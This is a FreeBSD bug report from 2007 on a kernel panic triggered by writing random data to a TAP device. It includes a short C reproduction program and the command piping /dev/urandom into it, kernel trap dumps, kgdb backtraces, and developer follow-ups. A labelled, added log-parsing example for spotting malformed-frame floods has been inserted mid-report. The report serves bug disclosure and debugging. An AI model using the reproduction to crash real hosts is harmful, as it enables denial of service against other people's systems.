Message-Id: <200712031508.lB3F8DVQ080758@www.freebsd.org>
Date: Mon, 3 Dec 2007 15:08:13 GMT
From: Gabor Berczi <gabor@berczi.be>
To: freebsd-gnats-submit@FreeBSD.org
Subject: local/remote kernel DoS through TAP device

>Number:         118399
>Category:       kern
>Synopsis:       [tap] local/remote kernel DoS through TAP device
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    secteam
>State:          closed
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Mon Dec 03 15:10:04 UTC 2007
>Closed-Date:    Sat Sep 24 04:16:38 UTC 2011
>Last-Modified:  Sat Sep 24 04:16:38 UTC 2011
>Originator:     Gabor Berczi
>Release:        6.2-RELEASE
>Organization:
>Environment:
Tested on x86/alpha, SMP/non-SMP.


>Description:
There is a bug somewhere in the FreeBSD kernel that causes lockup if the
TAP device receives abnormal data.

..
tap1: discard oversize frame (ether type 4f84 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 39e7 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 4fe7 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 44b4 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 87df flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 1c flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 1f flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 80c0 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 9a87 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type c5e6 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 2aab flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 656c flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type e6f3 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 48bd flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type ca87 flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type d0ca flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 249c flags 3 len 16384 > max 1514)
tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514)

fatal kernel trap:

    trap entry     = 0x2 (memory management fault)
    cpuid          = 0
    faulting va    = 0x34
    type           = access violation
    cause          = load instructon
    pc             = 0xfffffc00005dd39c
    ra             = 0xfffffc00005de15c
    sp             = 0xfffffe0007763870
    usp            = 0x11ffd6c0
    curthread      = 0xfffffc0001ef22b0
        pid = 31183, comm = zsh

panic: trap


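As an added, defender-side example that is not part of this PR: a small C parser for the "discard oversize frame" kernel log lines quoted above, counting discards per interface over constructed sample lines, so a flood of malformed frames hitting a tap device shows up in dmesg/syslog monitoring.

```c
/* Added example (not from the PR): parse the "discard oversize frame"
 * kernel log lines quoted above and count them per interface, a check a
 * defender can run over dmesg/syslog to spot a flood of malformed frames
 * hitting a tap device. The sample lines below are constructed. */
#include <stdio.h>
#include <string.h>
#define IFNAME_MAX 16

/* Parse a line like "tap1: discard oversize frame (ether type 4f84 flags 3
 * len 16384 > max 1514)"; return 1 and fill the fields on success, else 0. */
int parse_oversize_line(const char *line, char ifname[IFNAME_MAX],
    unsigned *ethertype, unsigned *flags, unsigned *len, unsigned *max)
{
	/* %15[^:] stops at the colon and leaves room for the NUL. */
	int n = sscanf(line,
	    "%15[^:]: discard oversize frame (ether type %x flags %x len %u > max %u)",
	    ifname, ethertype, flags, len, max);
	return n == 5;
}

/* Count discards logged for want_if; lines that do not parse (an arp:
 * complaint, say) or belong to another interface are skipped. */
unsigned count_oversize_discards(const char *const *lines, int nlines,
    const char *want_if)
{
	unsigned count = 0;
	for (int i = 0; i < nlines; i++) {
		char ifname[IFNAME_MAX];
		unsigned et, fl, len, max;
		if (parse_oversize_line(lines[i], ifname, &et, &fl, &len, &max) &&
		    strcmp(ifname, want_if) == 0 && len > max)
			count++;
	}
	return count;
}

/* Constructed sample input modelled on the report's dmesg excerpt. */
const char *const sample_log[] = {
	"tap1: discard oversize frame (ether type 4f84 flags 3 len 16384 > max 1514)",
	"arp: unknown hardware address format (0x1fff)",
	"tap0: discard oversize frame (ether type 1c flags 3 len 2048 > max 1514)",
	"tap1: discard oversize frame (ether type 80c0 flags 3 len 16384 > max 1514)",
};
const int sample_log_len = 4;

int main(void)
{
	printf("tap1: %u oversize frames discarded\n",
	    count_oversize_discards(sample_log, sample_log_len, "tap1"));
}
```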
>How-To-Repeat:
1. Compile this:

#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

/* Copy standard input to the tap device named on the command line,
 * one read() at a time, so whatever is piped in (step 3) is handed to
 * the tap driver as Ethernet frames. */
int main(int argc, char **argv)
{
	if (argc != 2)
		return 1;

	int fd = open(argv[1], O_WRONLY);
	if (fd < 0) {
		perror("open");
		return 1;
	}

	for (;;) {
		char buf[2048];
		ssize_t ret = read(0, buf, sizeof(buf));
		if (ret < 0) {
			perror("read");
			close(fd);
			return 1;
		}
		if (ret == 0)	/* end of input: stop instead of looping forever */
			break;
		/* Report a failed write but keep feeding the device. */
		if (write(fd, buf, ret) < 0)
			perror("write");
	}

	close(fd);
	return 0;
}

2. Load if_tap, and create tap0 device.
3. cat /dev/urandom|./a.out /dev/tap0

Sooner or later it'll die.


>Fix:


>Release-Note:
>Audit-Trail:
Responsible-Changed-From-To: freebsd-bugs->secteam 
Responsible-Changed-By: remko 
Responsible-Changed-When: Mon Dec 3 17:16:21 UTC 2007 
Responsible-Changed-Why:  
Thanks for submitting this; it would have been better to submit 
this to the secteam instead -> reassign. 



http://www.freebsd.org/cgi/query-pr.cgi?pr=118399 

From: Robert Watson <rwatson@FreeBSD.org>
To: Gabor Berczi <gabor@berczi.be>
Cc: freebsd-gnats-submit@FreeBSD.org
Subject: Re: misc/118399: local/remote kernel DoS through TAP device
Date: Thu, 6 Dec 2007 00:31:41 +0000 (GMT)

 On Mon, 3 Dec 2007, Gabor Berczi wrote:
 
 > There is a bug somewhere in the FreeBSD kernel that causes lockup if the TAP 
 > device receives abnormal data.
 
 As a data point, I tried this on a 7.0BETA4 i386 VM this evening and did not 
 run into the problem.  It seemed to fairly quietly suffer through fairly vast 
 quantities of random data, with occasional complaints from ARP that it had 
 received something that looked like an ARP packet but didn't meet 
 expectations:
 
    arp: unknown hardware address form (0xc32c)
    arp: unknown hardware address format (0x1fff)
    arp: unknwon hardware address format (0x2266)
 
 The oversize packet error in 6.2, found in if_ethersubr.c, is not present in 
 later FreeBSD versions, including 6.3.  Whether the bug is present is another 
 matter...  If someone could give this a spin on 6.2 and confirm the problem 
 there, and then on 6.3 in the same configuration, that would be useful.
 
 Robert N M Watson
 Computer Laboratory
 University of Cambridge

From: =?ISO-8859-1?Q?B=E9rczi_G=E1bor?= <gabor@berczi.be>
To: freebsd-gnats-submit@FreeBSD.org
Cc:  
Subject: Re: misc/118399: local/remote kernel DoS through TAP device
Date: Sat, 8 Dec 2007 12:12:45 +0100

 I ran it on 6.3-RC1 on my Alpha, and it still died, although no  
 messages this time.
 
 fatal kernel trap:
 
      trap entry     = 0x2 (memory management fault)
      cpuid          = 0
      faulting va    = 0xc6f8
      type           = access violation
      cause          = load instructon
      pc             = 0xfffffc00005f4750
      ra             = 0xfffffc0000642f44
      sp             = 0xfffffe00073adbd0
      curthread      = 0xfffffc0007c722b0
          pid = 20, comm = intr: fxp0
 
 panic: trap
 
 kgdb:
 
 #0  0xfffffc0000596f8c in doadump () at /data/src/sys/kern/kern_shutdown.c:240
 #1  0xfffffc00005978c8 in boot (howto=260)
      at /data/src/sys/kern/kern_shutdown.c:409
 #2  0xfffffc0000597eb8 in panic (fmt=0xfffffc0007c722b0 "\200\r?\a")
      at /data/src/sys/kern/kern_shutdown.c:565
 #3  0xfffffc000083c1fc in trap (a0=50936, a1=1, a2=0, entry=2,
      framep=0xfffffe00073adaa8) at /data/src/sys/alpha/alpha/trap.c:607
 #4  0xfffffc000082a17c in XentMM () at ./machine/asm.h:93
 #5  0xfffffc00005f4750 in m_length (m0=0xc6e1, last=0x0)
      at /data/src/sys/kern/uipc_mbuf.c:1173
 #6  0xfffffc0000642f44 in bpf_mtap_new (bp=0xfffffc0000e1d200,
      m=0xfffffc0007b26000) at /data/src/sys/net/bpf.c:1253
 #7  0xfffffc000064d98c in ether_input (ifp=0xfffffc0000c0c000,
      m=0xfffffc0007b26000) at /data/src/sys/net/if_ethersubr.c:566
 #8  0xfffffc00004468d4 in fxp_intr_body (sc=0xfffffc0000dce000,
      ifp=0xfffffc0000c0c000, statack=32 ' ', count=0)
      at /data/src/sys/dev/fxp/if_fxp.c:1715
 #9  0xfffffc000044646c in fxp_intr (xsc=0xc6e1)
      at /data/src/sys/dev/fxp/if_fxp.c:1536
 #10 0xfffffc0000573f1c in ithread_execute_handlers (p=0xc6e1,
      ie=0xfffffc0000c58500) at /data/src/sys/kern/kern_intr.c:682
 #11 0xfffffc0000574114 in ithread_loop (arg=0xc6e1)
      at /data/src/sys/kern/kern_intr.c:766
 #12 0xfffffc0000571f20 in fork_exit (
      callout=0xfffffc0000574080 <ithread_loop>, arg=0xfffffc0000dcd000,
      frame=0xfffffe00073add30) at /data/src/sys/kern/kern_fork.c:788
 #13 0xfffffc000082a388 in XentRestart () at ./machine/asm.h:254
 #14 0x0000000000000000 in ?? ()
 
 -- 
 Gabucino
 

From: =?ISO-8859-1?Q?B=E9rczi_G=E1bor?= <gabor@berczi.be>
To: bug-followup@FreeBSD.org
Cc:  
Subject: Re: misc/118399: local/remote kernel DoS through TAP device
Date: Sat, 8 Dec 2007 18:10:00 +0100

 On the other hand, I can't reproduce it on 8.0-CURRENT x86.
 
 -- 
 Gabucino
 

From: =?ISO-8859-1?Q?B=E9rczi_G=E1bor?= <gabor@berczi.be>
To: bug-followup@FreeBSD.org
Cc:  
Subject: Re: misc/118399: local/remote kernel DoS through TAP device
Date: Mon, 10 Dec 2007 10:17:07 +0100

 It's present on 6.3-PRERELEASE:
 
 fatal kernel trap:
 
      trap entry     = 0x2 (memory management fault)
      cpuid          = 0
      faulting va    = 0x6438
      type           = access violation
      cause          = load instructon
      pc             = 0xfffffc00005f4770
      ra             = 0xfffffc0000642f64
      sp             = 0xfffffe00073adbd0
      curthread      = 0xfffffc0007c722b0
          pid = 20, comm = intr: fxp0
 
 panic: trap
 
 #1  0xfffffc0000597c38 in boot (howto=260)
      at /data/src/sys/kern/kern_shutdown.c:409
 #2  0xfffffc0000598228 in panic (fmt=0xfffffc0007c722b0 "\200\r?\a")
      at /data/src/sys/kern/kern_shutdown.c:565
 #3  0xfffffc000083c20c in trap (a0=25656, a1=1, a2=0, entry=2,
      framep=0xfffffe00073adaa8) at /data/src/sys/alpha/alpha/trap.c:607
 #4  0xfffffc000082a18c in XentMM () at ./machine/asm.h:93
 #5  0xfffffc00005f4770 in m_length (m0=0x6420, last=0x0)
      at /data/src/sys/kern/uipc_mbuf.c:1173
 #6  0xfffffc0000642f64 in bpf_mtap_new (bp=0xfffffc0000e1d200,
      m=0xfffffc0007b26000) at /data/src/sys/net/bpf.c:1253
 #7  0xfffffc000064d9ac in ether_input (ifp=0xfffffc0000c0c000,
      m=0xfffffc0007b26000) at /data/src/sys/net/if_ethersubr.c:566
 #8  0xfffffc0000446c44 in fxp_intr_body (sc=0xfffffc0000dce000,
      ifp=0xfffffc0000c0c000, statack=224 '?', count=0)
      at /data/src/sys/dev/fxp/if_fxp.c:1715
 #9  0xfffffc00004467dc in fxp_intr (xsc=0x6420)
      at /data/src/sys/dev/fxp/if_fxp.c:1536
 #10 0xfffffc000057428c in ithread_execute_handlers (p=0x6420,
      ie=0xfffffc0000c58500) at /data/src/sys/kern/kern_intr.c:682
 #11 0xfffffc0000574484 in ithread_loop (arg=0x6420)
      at /data/src/sys/kern/kern_intr.c:766
 #12 0xfffffc0000572290 in fork_exit (
      callout=0xfffffc00005743f0 <ithread_loop>, arg=0xfffffc0000dcd000,
      frame=0xfffffe00073add30) at /data/src/sys/kern/kern_fork.c:788
 #13 0xfffffc000082a398 in XentRestart () at ./machine/asm.h:254
 #14 0x0000000000000000 in ?? ()
 
 -- 
 Gabucino
 
State-Changed-From-To: open->closed 
State-Changed-By: eadler 
State-Changed-When: Sat Sep 24 04:16:36 UTC 2011 
State-Changed-Why:  
Submitter can't reproduce with 8.x. If this is still an issue please 
reply and I'll reopen the PR. 

>Unformatted:
